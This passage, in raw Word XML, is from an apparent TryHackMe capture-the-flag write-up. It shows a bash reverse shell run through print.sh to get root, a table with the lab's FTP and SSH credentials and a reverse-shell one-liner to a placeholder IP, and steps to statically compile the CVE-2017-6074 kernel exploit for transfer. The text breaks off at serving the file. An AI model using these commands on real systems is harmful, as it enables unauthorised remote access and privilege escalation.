    <w:p w14:paraId="463601EA" w14:textId="0DE9AB97" w:rsidR="00D4731A" w:rsidRDefault="00D4731A" w:rsidP="005A77C4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="586865EB" wp14:editId="381ACCB3">
            <wp:extent cx="4696480" cy="857370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1740470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70169" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4696480" cy="857370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2A8ED7" w14:textId="77777777" w:rsidR="00D4731A" w:rsidRDefault="00D4731A" w:rsidP="005A77C4"/>
    <w:p w14:paraId="30B9AE2C" w14:textId="3355E19C" w:rsidR="00D4731A" w:rsidRDefault="00D4731A" w:rsidP="005A77C4">
      <w:r>
        <w:t>Here now that we have access to a bash script, I used a bash reverse shell</w:t>
      </w:r>
      <w:r w:rsidR="009D743E">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE074BA" w14:textId="77777777" w:rsidR="009D743E" w:rsidRDefault="009D743E" w:rsidP="005A77C4"/>
    <w:p w14:paraId="7B4DCAA2" w14:textId="03954D3E" w:rsidR="009D743E" w:rsidRDefault="009D743E" w:rsidP="005A77C4">
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve">And we can write the bash reverse shell and run the print.sh </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to execute the shell </w:t>
      </w:r>
      <w:r w:rsidRPr="009D743E">
        <w:t>then we</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> got </w:t>
      </w:r>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve">root by listening on the main machine and the root flag </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is in the main directory </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5B359C" w14:textId="77777777" w:rsidR="00D4731A" w:rsidRDefault="00D4731A" w:rsidP="005A77C4"/>
    <w:p w14:paraId="7F3987DF" w14:textId="77777777" w:rsidR="002E4036" w:rsidRDefault="002E4036"/>
    <w:p w14:paraId="74EEEA9F" w14:textId="5ABD1D78" w:rsidR="002E4036" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0392B"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="1A1A2E"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Extra</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E37195" w14:textId="77777777" w:rsidR="002E4036" w:rsidRDefault="002E403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E4036" w14:paraId="32C94294"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C8B55C" w14:textId="7A453316" w:rsidR="002E4036" w:rsidRDefault="009D743E">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ftp </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E246F6" w14:textId="6A251DB5" w:rsidR="002E4036" w:rsidRPr="009D743E" w:rsidRDefault="009D743E">
            <w:r w:rsidRPr="009D743E">
              <w:rPr>
                <w:rFonts w:eastAsia="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">User: Anonymous Password: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009D743E">
              <w:rPr>
                <w:rFonts w:eastAsia="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Annoynouse</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E4036" w14:paraId="1AFC972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C014D" w14:textId="742348CF" w:rsidR="002E4036" w:rsidRDefault="009D743E">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> reverse shell used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AE97F" w14:textId="0E3B9C8D" w:rsidR="002E4036" w:rsidRPr="009D743E" w:rsidRDefault="009D743E">
            <w:r w:rsidRPr="009D743E">
              <w:rPr>
                <w:rFonts w:eastAsia="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Default </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009D743E">
              <w:rPr>
                <w:rFonts w:eastAsia="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009D743E">
              <w:rPr>
                <w:rFonts w:eastAsia="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> reverse shell by kali </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D743E" w14:paraId="6E9F01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B420D" w14:textId="27B93DFC" w:rsidR="009D743E" w:rsidRDefault="009D743E">
            <w:r>
              <w:t>Bash reverse shell used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1D180" w14:textId="7969556D" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009D743E">
              <w:rPr>
                <w:rFonts w:eastAsia="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>bash -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009D743E">
              <w:rPr>
                <w:rFonts w:eastAsia="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009D743E">
              <w:rPr>
                <w:rFonts w:eastAsia="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009D743E">
              <w:rPr>
                <w:rFonts w:eastAsia="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009D743E">
              <w:rPr>
                <w:rFonts w:eastAsia="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/&lt;IP&gt;/4444 0&gt;&amp;1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E4036" w14:paraId="6700DA47"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3FDA8E" w14:textId="449A2549" w:rsidR="002E4036" w:rsidRPr="009D743E" w:rsidRDefault="009D743E">
            <w:r w:rsidRPr="009D743E">
              <w:rPr>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Machine kernel </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B0718D" w14:textId="37EAFBA4" w:rsidR="002E4036" w:rsidRPr="009D743E" w:rsidRDefault="009D743E">
            <w:r w:rsidRPr="009D743E">
              <w:rPr>
                <w:rFonts w:eastAsia="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="009D743E">
              <w:rPr>
                <w:rFonts w:eastAsia="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4.4 0 190 generic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E4036" w14:paraId="2D8B7806" w14:textId="77777777" w:rsidTr="009D743E">
        <w:trPr>
          <w:trHeight w:val="100"/>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2CE81" w14:textId="6B7ECEA8" w:rsidR="002E4036" w:rsidRDefault="009D743E">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Users </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8F63E" w14:textId="1B8C72C1" w:rsidR="002E4036" w:rsidRPr="009D743E" w:rsidRDefault="009D743E">
            <w:r w:rsidRPr="009D743E">
              <w:t xml:space="preserve">www-data, Lennie </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E4036" w14:paraId="3F43336F"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884D4D" w14:textId="473F12B6" w:rsidR="002E4036" w:rsidRDefault="009D743E">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Lennie ssh password</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0A7BFC" w14:textId="672C8436" w:rsidR="002E4036" w:rsidRPr="009D743E" w:rsidRDefault="009D743E">
            <w:r w:rsidRPr="009D743E">
              <w:t>c4ntg3t3n0ughsp1c3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42B18C4B" w14:textId="77777777" w:rsidR="002E4036" w:rsidRDefault="002E4036"/>
    <w:p w14:paraId="305FE719" w14:textId="3B7347DE" w:rsidR="002E4036" w:rsidRDefault="009D743E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0392B"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="1A1A2E"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="009D743E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE-2017-6074</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Kernal Exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41728A4B" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Before finding the scripts I found the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>kernal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> version had a exploit (CVE: 2017-6074) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62302959" w14:textId="77777777" w:rsidR="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Problem </w:t>
      </w:r>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve">is that since it’s a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>kernal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve"> exploit the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>kernal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve"> might crash </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A81CB0" w14:textId="77777777" w:rsidR="001623BD" w:rsidRPr="009D743E" w:rsidRDefault="001623BD" w:rsidP="009D743E"/>
    <w:p w14:paraId="6CAF2DD2" w14:textId="77777777" w:rsidR="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve">Exploit: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="009D743E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-6074/trigger.c</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3351B11A" w14:textId="77777777" w:rsidR="001623BD" w:rsidRPr="009D743E" w:rsidRDefault="001623BD" w:rsidP="009D743E"/>
    <w:p w14:paraId="2D9F2B3D" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4A8399" w14:textId="7EFB7B33" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve">Which didn’t work, because </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>lennie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve"> isnt a admin but the work around to this is</w:t>
      </w:r>
      <w:r w:rsidR="001623BD">
        <w:t xml:space="preserve"> to locally compile and then transfer to the target machine</w:t>
      </w:r>
      <w:r w:rsidRPr="009D743E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA76684" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001498F1" w14:textId="0FA0F5A8" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B0DF4BB" wp14:editId="68B1FF6D">
            <wp:extent cx="6086475" cy="1895475"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="5303458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86475" cy="1895475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="313C17DD" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696C499C" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A50C25B" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073D115A" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1: Identify the Target Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCF5993" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AC38DD" w14:textId="77777777" w:rsidR="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve">If you compile a program on a 64-bit machine, it won't run on a 32-bit machine. You need to know what the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve"> box is running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BAF418" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0E55AB" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t>On the target machine, run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F963BB" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6173B1E8" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve"> -m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7CFB3B" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBEDA22" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t>If it says x86_64, it's 64-bit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C2F9B5" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F266CD" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t>If it says i686 or i386, it's 32-bit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435E9C57" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA09597" w14:textId="77777777" w:rsidR="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D743E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2: Compile on Your Kali Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D99FF46" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E"/>
    <w:p w14:paraId="6E978F7B" w14:textId="6F81AF48" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t>Save the code to your Kali machine. Now, you need to compile it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4768426A" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C8C988" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t>The Magic Flag (-static): When you compile normally, Linux links the program to shared system libraries (like .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve"> files in Windows). If the target machine has different library versions than your Kali machine, the exploit will crash with a "GLIBC not found" error. To prevent this, you tell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve"> to bundle everything the program needs directly into the binary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E824E7" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDC51C4" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Run this on your Kali box:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05398741" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0671D4" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114981C0" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># If the target is 64-bit (and your Kali is 64-bit):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C034AE9" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>poc.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve"> -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>pwn_exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve"> -static</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355DB445" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D99CEC" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"># If the target is 32-bit (you might need to install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gcc-multilib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> first):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4565EC1D" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve"> -m32 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>poc.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve"> -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>pwn_exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve"> -static</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72200154" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DFE9D4" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D743E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3: Serve the File from Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391A3CAA" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
